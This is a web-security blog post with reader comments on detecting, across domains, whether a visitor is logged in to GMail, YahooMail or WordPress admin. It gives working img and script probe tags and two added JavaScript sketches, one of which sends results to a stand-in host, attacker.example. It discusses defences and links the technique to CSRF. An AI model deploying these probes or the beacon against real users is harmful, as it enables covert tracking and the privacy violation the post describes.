I’m sure similar URLs can be found on almost any website with user accounts. The GMail URL responds with an image when the user is logged in and HTML when they’re not. The YahooMail URL responds with just a simple HTML comment when logged in, or a large HTML error page when they’re not. The ha.ckers.org URL will only be served if you are logged in as an admin on WordPress; otherwise a forbidden message appears.
The ways the URLs respond are subtly different and require slightly different approaches when applied to Firefox 3 (b3), as we’ll see next.
For GMail it’s extremely simple.
<* img src="https://mail.google.com/mail/pimages/2/icons_ns1.png" onload="alert('GMail: Logged-In')" onerror="alert('Gmail: Not Logged-in')">
The IMG tag’s onload event handler fires if a valid image is returned, while the onerror event handler fires on invalid images (e.g., when HTML is received instead). Easy boolean logic. Of course, additional code is required to send the results back to the server, but that’s beyond our scope here.
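To make the boolean logic concrete, here is a minimal sketch of how the same check could be done programmatically, with the result reported back via a beacon image. The `attacker.example` host and the `buildReportUrl`/`probe` helper names are my own placeholders, not anything from the original post:

```javascript
// Hypothetical sketch: perform the img-based login check programmatically
// and report the finding to an attacker-controlled server.
// "attacker.example" and the helper names are illustrative placeholders.

function buildReportUrl(site, loggedIn) {
  // Encode the finding as query parameters on a beacon URL.
  return 'https://attacker.example/log?site=' +
         encodeURIComponent(site) + '&in=' + (loggedIn ? '1' : '0');
}

function probe(site, imageUrl) {
  var img = new Image();
  // onload fires only if the response parsed as a valid image
  img.onload = function () { (new Image()).src = buildReportUrl(site, true); };
  // onerror fires when HTML (or anything non-image) comes back
  img.onerror = function () { (new Image()).src = buildReportUrl(site, false); };
  img.src = imageUrl;
}

// Example: probe('GMail', 'https://mail.google.com/mail/pimages/2/icons_ns1.png');
```

The beacon trick (setting `src` on a throwaway `Image`) avoids any same-origin restrictions on the report, since image requests are allowed cross-domain.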
The ha.ckers.org example is exactly the same as GMail’s.
<* img src="http://ha.ckers.org/blog/wp-admin/images/toggle.gif" onload="alert('RSnake: Logged-In')" onerror="alert('RSnake: Not Logged-in')">
The YahooMail example is almost as simple, but has to be implemented a little differently since we’re dealing with only HTML responses and no images.
<* script src="http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch" onload="alert('YahooMail: Logged-in')" onerror="alert('YahooMail: Not Logged-in')"><* /script>
Website owners can do one of two things here:
Remove authentication from the resource if the content isn’t particularly sensitive
Add CSRF-like secret tokens so that the URL is not predictable
At the end of the day, though, it’s unlikely that any of these websites, or others with similar issues, will take either step. Even if they did, there are so many other ways to pull off the same attack (timing attacks, monitoring onload events, probing for named iframes, JS console errors, etc.) that the value is somewhat limited. I had a long discussion with Chris Evans and Rich Cannings from Google about this particular issue to get their insights.
In our collective opinion, it’s probably not the responsibility of website owners to change their (arguably secure) application behavior to compensate for the browser leaking cross-domain information, though they still could if they really wanted to. Also, it’s probably a lot easier for the browser vendors to remedy this issue in some clever way than for every website owner to do the above. What do you think?
Very nice post, Jeremiah. I checked only the Google PoC. If you choose a different language (Slovak, for example), the PoC doesn't work. But it's a very interesting find anyway.
Hrm, yes, very interesting point of view there.
Thanks for the read. I always read your blogs!
But how do you get the events to trigger? I tried sending an email to the GMail account containing the image tag, with the content-type set to text/html. The image showed but the onload event didn't trigger.
@ehmo, thank you. Hmph, I wouldn't have thought that a language change would have impacted that. Interesting. I'm sure in that language, or other language settings, there should be another image URL that does essentially the same thing.
@Thijs, thank you very much, I appreciate it. Every once in a while I get to have a little fun with web hacking. :)
@Anonymous, the event handlers should trigger automatically depending on the state of the user. Remember though, I've only tested on Firefox; if you're using IE that could change things, but it should still work with some porting.
"Login Detection, whose problem is it?"
"IF" ot is deemed a problem for a particular site, then it it the site developer's problem.
Hackers, being hackers, cannot be expected to confine their behavior to secure browsers, nor can we rely on browser makers to make secure browsers.
I guess the answer depends on what type of attack you think this is.
1. Information leakage leading to privacy disclosure, website history stealing, etc.
2. A precursor to a CSRF attack (or other?)
If it's #1, then I suppose in some ways we're sort of stuck with it. Almost all websites are going to have some sort of protected content that will allow the cross-domain user to determine status. There are several proposals out there for fixing CSRF with cookie tags that prevent cross-domain posting/sending of those cookies in certain scenarios. That might help this, though I think you might still end up with cases of information leakage.
If the problem we're worried about is #2, then preventing the information leakage isn't all that beneficial. For a large site like Yahoo or Google, you can blindly fire away at random users attempting CSRF attacks, since you'll hit a decent number of them who will be logged in.
So, what are we trying to prevent? I'm not saying protecting against browser history/patterns isn't a serious goal, just trying to understand what you think the risks are.
I think you are correct in both cases. CSRF "attacks" will be performed blind, and the most likely abuse case for this will be privacy and data gathering. Probably marketers and advertisers.
While I also think cross-domain information leakage will persist for the foreseeable future, I would hope the browser vendors could make it a little harder to pull off.
It's fun, but every time I check your blog, I become a little more "security paranoid"...
I guess that this could be a browser issue... or not...
Should the browser allow a script in case an error occurs?... It's kinda CSRF...
But well... just wait...
1) I hate that you use Blogspot... I don't like this "comment page"...
2) You aren't the first result in google anymore :P
Hola. I am new to this blog and it does seem like a really cool site on web security. =D
Just to clarify something: to perform this kind of information gathering, we would still need to inject the JavaScript into the client's browser, wouldn't we?
Secondly, the script would have to leech a predefined script variable to get the username?
@Ironic, yah, my blog tends to have that effect on people. We give the gift of paranoia. :) Also, "jeremiah grossman" comes up #1 on Google; I'm working on "jeremiah" next. :)
@MauricE, the answer to your first question is yes, you need to find a way to run JS in the person's browser first. With this method, though, you really can't tell WHO they are logged in as... only that they are logged in.
Depending on how the output of the authenticated area or content is both formed and produced one may also use enumeration methods similar to those found in the RES protocol vulnerability where the images' widths and heights are checked and tested against the known values for logged-in users. Of course that is assuming the "flag" for a user's status is produced in the form of an image, but it would also be possible to read other attributes as well depending on the type of file. It is definitely a precursor to initiating and leveraging CSRF attacks against users.
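The dimension-checking idea above could look something like the following. This is my own hypothetical sketch; the probed URL, the 16×16 expected size, and the helper names are all made-up placeholders for whatever the real logged-in indicator image would be:

```javascript
// Hypothetical sketch of the dimension check described above: compare a
// probed image's natural size against known values for the logged-in state.
// The expected 16x16 size and the helper names are illustrative placeholders.

var KNOWN_LOGGED_IN_SIZE = { width: 16, height: 16 };

function matchesLoggedInIcon(width, height) {
  return width === KNOWN_LOGGED_IN_SIZE.width &&
         height === KNOWN_LOGGED_IN_SIZE.height;
}

function probeDimensions(url, callback) {
  var img = new Image();
  img.onload = function () {
    // naturalWidth/naturalHeight reflect the decoded image's true size,
    // regardless of any CSS or attribute sizing.
    callback(matchesLoggedInIcon(img.naturalWidth, img.naturalHeight));
  };
  img.onerror = function () { callback(false); };
  img.src = url;
}
```

This refines the plain onload/onerror boolean into a fingerprint: even when both states return a valid image, differing dimensions can still reveal login status.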
@Andrew, good points. I've been thinking a lot about your last sentence lately. I'm on the fence as to whether an authentication-CSRF check by the attacker precedes the actual attack. I mean, why not just perform the attack blind? It's faster and easier, and if it works, it works. I'm thinking authentication-CSRF checks are probably done for user profiling (marketing) more than anything else.
While I agree that attempting to perform the CSRF attack blindly is indeed much quicker and easier, it is also more likely to alert unsuspecting users should something go awry in the script/attack. Granted, a large majority of individuals may not realize what is going on; however, there are attentive users who may question why a Google or Yahoo! (just examples) URL has appeared briefly in the browser's status bar, indicating something has loaded from such third-party websites. Of course, again, it really comes down to the method being used to perform the attack along with the content output when users are authenticated. I suppose it's just a personal preference, but I always have checks and boundaries in place on the payloads I write to make sure such functions are not executed prematurely, or in instances where users will not be able to complete each task, because again there's no reason to alert the user (or victim) of any wrongdoing if it is not going to be successful.